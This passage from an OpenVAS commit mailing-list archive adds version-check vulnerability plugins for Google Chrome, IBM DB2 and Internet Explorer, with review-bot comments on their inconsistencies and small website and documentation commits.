+ + Impact Level: Application + + Affected Software/OS: + Google Chrome version 3.0.193.21 and prior on Windows. + + Fix: + No solution or patch is available as on 05th October, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://www.google.com/chrome + + References: + http://en.securitylab.ru/nvd/386075.php + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 6.4 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of Google Chrome"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("gb_google_chrome_detect_win.nasl"); + script_require_keys("GoogleChrome/Win/Ver"); + exit(0); +} + + +include("version_func.inc"); + +chromeVer = get_kb_item("GoogleChrome/Win/Ver"); +if(isnull(chromeVer)){ + exit(0); +} + +# Check for Google Chrome Version <= 3.0.195.21 +if(version_is_less_equal(version:chromeVer, test_version:"3.0.195.21")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_lin_oct09.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_lin_oct09.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_lin_oct09.nasl 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -0,0 +1,91 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ibm_db2_mult_vuln_lin_oct09.nasl 5093 2009-10-05 16:03:51Z oct $ +# +# IBM DB2 Multiple Vulnerabilities - Oct09 (Linux) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801001); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3471", "CVE-2009-3472"); + script_bugtraq_id(36540); + script_name("IBM DB2 Multiple Vulnerabilities - Oct09 (Linux)"); + + desc = " + Overview: The host is installed with IBM DB2 and is prone to multiple + vulnerabilities. + + Vulnerability Insight: + - An unspecified error exists related to a table function when the definer + loses required privileges. + - An unspecified error can be exploited to insert, update, or delete rows in + a table without having required privileges. + + Impact: Unknow impact. + + Impact Level: System/Application + + Affected Software/OS: + IBM DB2 version 8 prior to Fixpak 18 + IBM DB2 version 9.1 prior to Fixpak 8 + IBM DB2 version 9.5 prior to Fixpak 4 + + Fix:Update DB2 8 Fixpak 18 or 9.1 Fixpak 8 or 9.5 Fixpak 4 or later. 
+ http://www-01.ibm.com/support/docview.wss?rs=71&uid=swg27007053 + + References: + http://secunia.com/advisories/36890 + http://www-01.ibm.com/support/docview.wss?uid=swg21403619 + http://www-01.ibm.com/support/docview.wss?uid=swg21386689 + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 5.5 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of IBM DB2"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("secpod_ibm_db2_detect_linux_900217.nasl"); + script_require_keys("Linux/IBM-db2/Ver"); + exit(0); +} + + +include("version_func.inc"); + +ibmVer = get_kb_item("Linux/IBM-db2/Ver"); +if(!ibmVer){ + exit(0); +} + +# Check for IBM DB2 version 8 before FP18, 9.1 before FP8, 9.5 before FP4 +# 9.1 FP8 =>9.1.0.8, 9.5 FP4 =>9.5.0.4, 8 FP18 =>8.1.18 +if(version_in_range(version:ibmVer, test_version:"8.0", test_version2:"8.1.17")|| + version_in_range(version:ibmVer, test_version:"9.1", test_version2:"9.1.0.7")|| + version_in_range(version:ibmVer, test_version:"9.5", test_version2:"9.5.0.3")){ + security_hole(0); +} Added: trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_win_oct09.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_win_oct09.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_win_oct09.nasl 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -0,0 +1,91 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ibm_db2_mult_vuln_win_oct09.nasl 5093 2009-10-05 15:11:27Z oct $ +# +# IBM DB2 Multiple Vulnerabilities - Oct09 (Win) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801009); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3471", "CVE-2009-3472"); + script_bugtraq_id(36540); + script_name("IBM DB2 Multiple Vulnerabilities - Oct09 (Win)"); + + desc = " + Overview: The host is installed with IBM DB2 and is prone to multiple + vulnerabilities. + + Vulnerability Insight: + - An unspecified error exists related to a table function when the definer + loses required privileges. + - An unspecified error can be exploited to insert, update, or delete rows in + a table without having required privileges. + + Impact: Unknow impact. + + Impact Level: System/Application + + Affected Software/OS: + IBM DB2 version 8 prior to Fixpak 18 + IBM DB2 version 9.1 prior to Fixpak 8 + IBM DB2 version 9.5 prior to Fixpak 4 + + Fix:Update DB2 8 Fixpak 18 or 9.1 Fixpak 8 or 9.5 Fixpak 4 or later. 
+ http://www-01.ibm.com/support/docview.wss?rs=71&uid=swg27007053 + + References: + http://secunia.com/advisories/36890 + http://www-01.ibm.com/support/docview.wss?uid=swg21403619 + http://www-01.ibm.com/support/docview.wss?uid=swg21386689 + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 5.5 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of IBM DB2"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("secpod_ibm_db2_detect_win_900218.nasl"); + script_require_keys("Win/IBM-db2/Ver"); + exit(0); +} + + +include("version_func.inc"); + +ibmVer = get_kb_item("Win/IBM-db2/Ver"); +if(!ibmVer){ + exit(0); +} + +# Check for IBM DB2 version 8 before FP18, 9.1 before FP8, 9.5 before FP4 +# 9.1 FP8 => 9.1.800.1023, 9.5 FP4 => 9.5.400.576, 8 FP18 =>8.1.18 +if(version_in_range(version:ibmVer, test_version:"8.0", test_version2:"8.1.17")|| + version_in_range(version:ibmVer, test_version:"9.1", test_version2:"9.1.800.1022")|| + version_in_range(version:ibmVer, test_version:"9.5", test_version2:"9.5.400.575")){ + security_hole(0); +} Added: trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_lin.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_lin.nasl 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -0,0 +1,85 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ibm_db2_unspesified_vuln_lin.nasl 5093 2009-10-05 18:11:27Z oct $ +# +# IBM DB2 Unspecified Vulnerability (Linux) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801003); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3473"); + script_name("IBM DB2 Unspecified Vulnerability (Linux)"); + desc = " + Overview: The host is installed with IBM DB2 and is prone to unspecified + vulnerability. + + Vulnerability Insight: + An unspecified error in the handling of 'SET SESSION AUTHORIZATION' + statements that can be exploited to execute the statement without having + the required privileges. + + Impact: Unknow impact. + + Impact Level: System/Application. + + Affected Software/OS: + IBM DB2 version 9.1 prior to Fixpak 8 + + Fix:Update DB2 9.1 Fixpak 8 or later. 
+ http://www-01.ibm.com/support/docview.wss?rs=71&uid=swg27007053 + + References: + http://secunia.com/advisories/36890 + http://www-01.ibm.com/support/docview.wss?uid=swg21403619 + http://www-01.ibm.com/support/docview.wss?uid=swg21386689 + + CVSS Score: + CVSS Base Score : 10.0 (AV:N/AC:L/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 7.4 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of IBM DB2"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("secpod_ibm_db2_detect_linux_900217.nasl"); + script_require_keys("Linux/IBM-db2/Ver"); + exit(0); +} + + +include("version_func.inc"); + +ibmVer = get_kb_item("Linux/IBM-db2/Ver"); +if(!ibmVer){ + exit(0); +} + +# Check for IBM DB2 Products Version 9.1 before FP8 +# IBM DB2 9.1 FP8 =>9.1.0.8 +if(version_in_range(version:ibmVer, test_version:"9.1", + test_version2:"9.1.0.7")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_lin.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_win.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_win.nasl 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -0,0 +1,85 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ibm_db2_unspesified_vuln_win.nasl 5093 2009-10-05 17:11:27Z oct $ +# +# IBM DB2 Unspecified Vulnerability (Win) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801002); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3473"); + script_name("IBM DB2 Unspecified Vulnerability (Win)"); + desc = " + Overview: The host is installed with IBM DB2 and is prone to unspecified + vulnerability. + + Vulnerability Insight: + An unspecified error in the handling of 'SET SESSION AUTHORIZATION' + statements that can be exploited to execute the statement without having + the required privileges. + + Impact: Unknown impact. + + Impact Level: System/Application. + + Affected Software/OS: + IBM DB2 version 9.1 prior to Fixpak 8 + + Fix:Update DB2 9.1 Fixpak 8 or later. 
+ http://www-01.ibm.com/support/docview.wss?rs=71&uid=swg27007053 + + References: + http://secunia.com/advisories/36890 + http://www-01.ibm.com/support/docview.wss?uid=swg21403619 + http://www-01.ibm.com/support/docview.wss?uid=swg21386689 + + CVSS Score: + CVSS Base Score : 10.0 (AV:N/AC:L/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 7.4 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of IBM DB2"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("secpod_ibm_db2_detect_win_900218.nasl"); + script_require_keys("Win/IBM-db2/Ver"); + exit(0); +} + + +include("version_func.inc"); + +ibmVer = get_kb_item("Win/IBM-db2/Ver"); +if(!ibmVer){ + exit(0); +} + +# Check for IBM DB2 Products Version 9.1 before FP8 +# IBM DB2 9.1 FP8 => 9.1.800.1023 +if(version_in_range(version:ibmVer, test_version:"9.1", + test_version2:"9.1.800.1022")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_win.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -0,0 +1,87 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl 5091 2009-10-05 21:51:26Z oct $ +# +# Microsoft IE CA SSL Certificate Security Bypass Vulnerability - Oct09 +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801109); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3454"); + script_bugtraq_id(36475); + script_name("Microsoft IE CA SSL Certificate Security Bypass Vulnerability - Oct09"); + desc = " + Overview: This host is installed with Internet Explorer and is prone to + Security Bypass vulnerability. + + Vulnerability Insight: + Microsoft Internet Explorer fails to properly validate '\0' character in the + domain name in a signed CA certificate, allowing attackers to substitute + malicious SSL certificates for trusted ones. + + Impact: + Successful exploitation will let the attackers to perform man-in-the-middle + attacks or impersonate trusted servers, which will aid in further attack. 
+ + Impact Level: Application + + Affected Software/OS: + Microsoft IE version 6.x/7.x/8.x + + Fix: No solution or patch is available as on 05th October, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://www.google.com/chrome + + References: + http://www.wired.com/threatlevel/2009/07/kaminsky/ + http://www.networkworld.com/news/2009/073009-more-holes-found-in-webs.html + http://www.networkworld.com/news/2009/091709-microsoft-ie-security-hole.html + + CVSS Score: + CVSS Base Score : 6.8 (AV:N/AC:M/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 5.8 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of Google Chrome"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("gb_ms_ie_detect.nasl"); + script_require_keys("MS/IE/Version"); + exit(0); +} + + +include("version_func.inc"); + +ieVer = get_kb_item("MS/IE/Version"); +if(isnull(ieVer)){ + exit(0); +} + +# Check for IE version 6.x or 7.x or 8.x +if(ieVer =~ "^(6|7|8)\..*"){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl ___________________________________________________________________ Name: svn:executable + * From scm-commit at wald.intevation.org Tue Oct 6 07:45:14 2009 
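Review bot: cve_current.txt still lists CVE-2009-3471, CVE-2009-3472 and CVE-2009-3473 as plain "SecPod" entries, although this commit adds gb_ibm_db2_mult_vuln_lin_oct09.nasl, gb_ibm_db2_mult_vuln_win_oct09.nasl and the two gb_ibm_db2_unspesified_vuln_*.nasl scripts with exactly those script_cve_id values. The other CVEs covered by this commit (CVE-2009-3330, CVE-2009-3431, CVE-2009-3454, CVE-2009-3456) received an "svn R" or "svn L" marker in the same hunk, so the three DB2 entries should be marked as well.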
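Review bot: in gb_adobe_acrobat_pdf_dos_vuln.nasl the Overview says the host has "Adobe Acrobat or Adobe Acrobat Reader" installed, but script_require_keys and get_kb_item only use "Adobe/Acrobat/Win/Ver" and the Affected Software section names only Adobe Acrobat. Either drop Reader from the Overview or also test the Reader version, so the description matches what the script checks.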
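Review bot: the version pattern "[V|v]([0-9.]+)" in gb_cpcreator_detect.nasl is unanchored and its character class also accepts a literal '|', so the first 'v' followed by digits or dots anywhere in the response is stored as the cP Creator version. Write the class as [Vv] and tie the match to the "cP Creator" banner text. In the same loop, string(path, "/index.php") produces "//index.php" for the "/" entry of make_list, and the loop continues after a hit, so more than one value can end up under the same KB name; skip the extra slash and stop after the first match.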
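Review bot: script_copyright("Copyright (C) Intevation GmbH") in gb_cpcreator_sql_inj_vuln.nasl omits the year that the file's header comment and the other plugins in this commit carry ("Copyright (C) 2009 Intevation GmbH"). The Overview sentence also lacks its closing period, and script_summary reads "Check for the version cP Creator" where "of" is missing.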
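Review bot: the Affected Software text in gb_google_chrome_sec_bypass_vuln_oct09.nasl says "Google Chrome version 3.0.193.21 and prior", while the comment and the version_is_less_equal call use test_version:"3.0.195.21". One of the two values is wrong; confirm the affected version against the advisory and make the description and the check agree. "Successfully exploitation" in the Impact paragraph should read "Successful exploitation".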
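Review bot: "Impact: Unknow impact." appears in gb_ibm_db2_mult_vuln_lin_oct09.nasl, gb_ibm_db2_mult_vuln_win_oct09.nasl and gb_ibm_db2_unspesified_vuln_lin.nasl, while gb_ibm_db2_unspesified_vuln_win.nasl has the correct "Unknown impact."; fix the three. The file names spell "unspesified" where script_name says "Unspecified", and "Fix:Update" lacks a space after the colon in all four descriptions. In the Windows checks the upper bounds 9.1.800.1022 and 9.5.400.575 rest on build numbers that appear only in a comment, so a short note on where those numbers come from would help whoever maintains the ranges.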
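Review bot: gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl carries text copied from the Chrome plugin: script_summary is "Check for the version of Google Chrome" and the Fix section points to http://www.google.com/chrome for updates, although the script tests "MS/IE/Version". Change both to refer to Internet Explorer. The check ieVer =~ "^(6|7|8)\..*" flags every 6.x, 7.x and 8.x install regardless of patch level, which matches the "no patch available" statement in the description but will need a version bound once a fix ships.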
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 07:45:14 +0200 (CEST) Subject: [Openvas-commits] r5380 - trunk/doc/website Message-ID: <20091006054514.C60DE852B84E@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 07:45:14 +0200 (Tue, 06 Oct 2009) New Revision: 5380 Modified: trunk/doc/website/Makefile Log: Force protocol version 29 Modified: trunk/doc/website/Makefile =================================================================== --- trunk/doc/website/Makefile 2009-10-06 05:21:15 UTC (rev 5379) +++ trunk/doc/website/Makefile 2009-10-06 05:45:14 UTC (rev 5380) @@ -54,7 +54,7 @@ online: all echo "Going to put current contents online for openvas.wald.intevation.org ..." - rsync -urvP --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ + rsync --proto=29 -urvP --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ $(USER)@wald.intevation.org:/openvas/htdocs/ install: all From scm-commit at wald.intevation.org Tue Oct 6 07:48:03 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 07:48:03 +0200 (CEST) Subject: [Openvas-commits] r5381 - trunk/doc/website Message-ID: <20091006054803.87B4F852B84F@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 07:48:03 +0200 (Tue, 06 Oct 2009) New Revision: 5381 Modified: trunk/doc/website/Makefile Log: Fix typo Modified: trunk/doc/website/Makefile =================================================================== --- trunk/doc/website/Makefile 2009-10-06 05:45:14 UTC (rev 5380) +++ trunk/doc/website/Makefile 2009-10-06 05:48:03 UTC (rev 5381) 
@@ -54,7 +54,7 @@ online: all echo "Going to put current contents online for openvas.wald.intevation.org ..." - rsync --proto=29 -urvP --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ + rsync --protocol=29 -urvP --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ $(USER)@wald.intevation.org:/openvas/htdocs/ install: all From scm-commit at wald.intevation.org Tue Oct 6 07:48:42 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 07:48:42 +0200 (CEST) Subject: [Openvas-commits] r5382 - trunk/doc/website Message-ID: <20091006054842.A1E93852B84F@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 07:48:42 +0200 (Tue, 06 Oct 2009) New Revision: 5382 Modified: trunk/doc/website/constitution.htm4 trunk/doc/website/openvas-contest-2008.htm4 trunk/doc/website/openvas-contest.htm4 trunk/doc/website/openvas.css trunk/doc/website/template_header.m4 Log: Fix up contact email address Modified: trunk/doc/website/constitution.htm4 =================================================================== --- trunk/doc/website/constitution.htm4 2009-10-06 05:48:03 UTC (rev 5381) +++ trunk/doc/website/constitution.htm4 2009-10-06 05:48:42 UTC (rev 5382) @@ -6,7 +6,7 @@ m4_dnl Description: Constitution for OpenVAS project m4_dnl m4_dnl Authors: -m4_dnl Tim Brown +m4_dnl Tim Brown m4_dnl m4_dnl Copyright: m4_dnl Copyright (C) 2007 Tim Brown @@ -39,7 +39,7 @@

Project contacts

Modified: trunk/doc/website/openvas-contest-2008.htm4 =================================================================== --- trunk/doc/website/openvas-contest-2008.htm4 2009-10-06 05:48:03 UTC (rev 5381) +++ trunk/doc/website/openvas-contest-2008.htm4 2009-10-06 05:48:42 UTC (rev 5382) @@ -7,7 +7,7 @@ m4_dnl m4_dnl Authors: m4_dnl Michael Wiegand -m4_dnl Tim Brown +m4_dnl Tim Brown m4_dnl m4_dnl Copyright: m4_dnl Copyright (C) 2008 Intevation GmbH @@ -73,7 +73,7 @@

Modified: trunk/doc/website/openvas-contest.htm4 =================================================================== --- trunk/doc/website/openvas-contest.htm4 2009-10-06 05:48:03 UTC (rev 5381) +++ trunk/doc/website/openvas-contest.htm4 2009-10-06 05:48:42 UTC (rev 5382) @@ -85,7 +85,7 @@

Modified: trunk/doc/website/openvas.css =================================================================== --- trunk/doc/website/openvas.css 2009-10-06 05:48:03 UTC (rev 5381) +++ trunk/doc/website/openvas.css 2009-10-06 05:48:42 UTC (rev 5382) @@ -4,7 +4,7 @@ * * Authors: * Jan-Oliver Wagner - * Tim Brown + * Tim Brown * * Copyright: * Copyright (C) 2007 Intevation GmbH Modified: trunk/doc/website/template_header.m4 =================================================================== --- trunk/doc/website/template_header.m4 2009-10-06 05:48:03 UTC (rev 5381) +++ trunk/doc/website/template_header.m4 2009-10-06 05:48:42 UTC (rev 5382) @@ -8,7 +8,7 @@ m4_dnl m4_dnl Authors: m4_dnl Jan-Oliver Wagner -m4_dnl Tim Brown +m4_dnl Tim Brown m4_dnl m4_dnl Copyright: m4_dnl Copyright (C) 2007 Intevation GmbH From scm-commit at wald.intevation.org Tue Oct 6 07:51:07 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 07:51:07 +0200 (CEST) Subject: [Openvas-commits] r5383 - trunk/openvas-compendium Message-ID: <20091006055107.7AED2852B84F@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 07:51:06 +0200 (Tue, 06 Oct 2009) New Revision: 5383 Modified: trunk/openvas-compendium/ChangeLog trunk/openvas-compendium/openvas-compendium.tex Log: Fix up contact email address Modified: trunk/openvas-compendium/ChangeLog =================================================================== --- trunk/openvas-compendium/ChangeLog 2009-10-06 05:48:42 UTC (rev 5382) +++ trunk/openvas-compendium/ChangeLog 2009-10-06 05:51:06 UTC (rev 5383) @@ -160,7 +160,7 @@ translation, updated information regarding port usage by older and more recent versions of OpenVAS. -2009-01-04 Tim Brown +2009-01-04 Tim Brown * openvas-compendium.de.tex, openvas-compendium.tex: Updated to reflect IANA's port assignment. 
@@ -382,7 +382,7 @@ * openvas-compendium.de.tex: Minor spelling fixes in the OTP chapter. -2008-10-16 Tim Brown +2008-10-16 Tim Brown * openvas-compendium.tex: Updated with details of knowledge base items in use for Solaris Local Security Checks and @@ -560,7 +560,7 @@ * openvas-compendium.tex: Adapted OTP documentation from specification. -2008-09-10 Tim Brown +2008-09-10 Tim Brown * openvas-compendium.tex: Added details about automatically updating. Modified: trunk/openvas-compendium/openvas-compendium.tex =================================================================== --- trunk/openvas-compendium/openvas-compendium.tex 2009-10-06 05:48:42 UTC (rev 5382) +++ trunk/openvas-compendium/openvas-compendium.tex 2009-10-06 05:51:06 UTC (rev 5383) @@ -6,7 +6,7 @@ % Authors: % Jan-Oliver Wagner % Michael Wiegand -% Tim Brown +% Tim Brown % % Copyright: % Copyright (C) 2008, 2009 Intevation GmbH From scm-commit at wald.intevation.org Tue Oct 6 08:02:08 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 08:02:08 +0200 (CEST) Subject: [Openvas-commits] r5384 - trunk/openvas-plugins/scripts Message-ID: <20091006060208.4FD08861EAB2@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 08:02:06 +0200 (Tue, 06 Oct 2009) New Revision: 5384 Modified: trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl trunk/openvas-plugins/scripts/ike-scan.nasl Log: Tidied up plugins Modified: trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl =================================================================== --- trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl 2009-10-06 05:51:06 UTC (rev 5383) +++ trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl 2009-10-06 06:02:06 UTC (rev 5384) 
@@ -26,7 +26,13 @@ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. # -desc = "Checkpoint VPN-1 PAT information disclosure +if (description) +{ + script_id(80096); + script_cve_id("CVE-2008-5849"); + name = "Checkpoint VPN-1 PAT information disclosure"; + script_name(name); + desc = "Checkpoint VPN-1 PAT information disclosure By sending crafted packets to ports on the firewall which are mapped by port address translation (PAT) to ports on internal devices, information about the internal network may be disclosed in the resulting ICMP error packets. Port 18264/tcp on the firewall is typically configured in such a manner, with packets to this port being rewritten to reach the firewall management server. For example, the firewall fails to correctly sanitise the encapsulated IP headers in ICMP time-to-live exceeded packets resulting in internal IP addresses being disclosed. @@ -49,13 +55,6 @@ where this vulnerability is reported. Risk factor: Low"; - -if (description) -{ - script_id(80096); - script_cve_id("CVE-2008-5849"); - name = "Checkpoint VPN-1 PAT information disclosure"; - script_name(name); script_description(desc); summary = "Determines whether Checkpoint VPN-1 is disclosing information about the internal network via PAT"; script_summary(summary); Modified: trunk/openvas-plugins/scripts/ike-scan.nasl =================================================================== --- trunk/openvas-plugins/scripts/ike-scan.nasl 2009-10-06 05:51:06 UTC (rev 5383) +++ trunk/openvas-plugins/scripts/ike-scan.nasl 2009-10-06 06:02:06 UTC (rev 5384) 
@@ -49,9 +49,9 @@ script_name(name); desc = "ike-scan (NASL wrapper) - This plugin runs ike-scan to identify IPSEC VPN endpoints. It will attempt to enumerate supported cipher suites, bruteforce valid groupnames and fingerprint any endpoint identified. +This plugin runs ike-scan to identify IPSEC VPN endpoints. It will attempt to enumerate supported cipher suites, bruteforce valid groupnames and fingerprint any endpoint identified. - See the section 'plugins options' to configure it"; +See the section 'plugins options' to configure it"; script_description(desc); summary = "Identifies IPSEC VPN endpoints"; script_summary(summary); From scm-commit at wald.intevation.org Tue Oct 6 08:12:51 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 08:12:51 +0200 (CEST) Subject: [Openvas-commits] r5385 - in trunk/openvas-plugins: . scripts Message-ID: <20091006061251.7C290861EAC3@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 08:12:48 +0200 (Tue, 06 Oct 2009) New Revision: 5385 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl trunk/openvas-plugins/scripts/dns_xfer.nasl trunk/openvas-plugins/scripts/gather-package-list.nasl trunk/openvas-plugins/scripts/ike-scan.nasl trunk/openvas-plugins/scripts/msdns-server-hostname-disclosure.nasl trunk/openvas-plugins/scripts/visionsoft-audit-detect.nasl Log: Fix up contact email address Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-06 06:02:06 UTC 